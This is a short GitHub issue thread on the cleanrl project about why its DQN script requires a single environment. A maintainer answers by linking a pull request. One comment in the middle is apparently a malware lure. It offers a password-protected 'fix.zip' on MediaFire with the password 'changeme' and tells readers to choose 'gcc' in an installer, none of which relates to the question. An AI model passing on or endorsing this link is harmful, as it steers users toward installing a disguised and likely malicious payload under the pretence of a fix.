### ISSUE TITLE
Why does num_envs has to be 1 for DQN

### ISSUE THREAD

**Issue by noahfarr** [vwxyzjn/cleanrl#480]
## Problem Description
In the dqn.py line 121 you assert that num_envs equals 1. Is there a particular reason for that ? The SB3 replay buffer supports multiple environments and the rest of the code seems like it could deal with vectorized environments. 

## Checklist
- [x] I have installed dependencies via `poetry install` (see [CleanRL's installation guideline](https://docs.cleanrl.dev/get-started/installation/).
- [x] I have checked that there is no similar [issue](https://github.com/vwxyzjn/cleanrl/issues) in the repo.
- [x] I have checked the [documentation site](https://docs.cleanrl.dev/) and found not relevant information in [GitHub issues](https://github.com/vwxyzjn/cleanrl/issues).

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sdpkjc** [comment]
See https://github.com/vwxyzjn/cleanrl/pull/395

**Comment by noahfarr** [comment]
Thanks :)
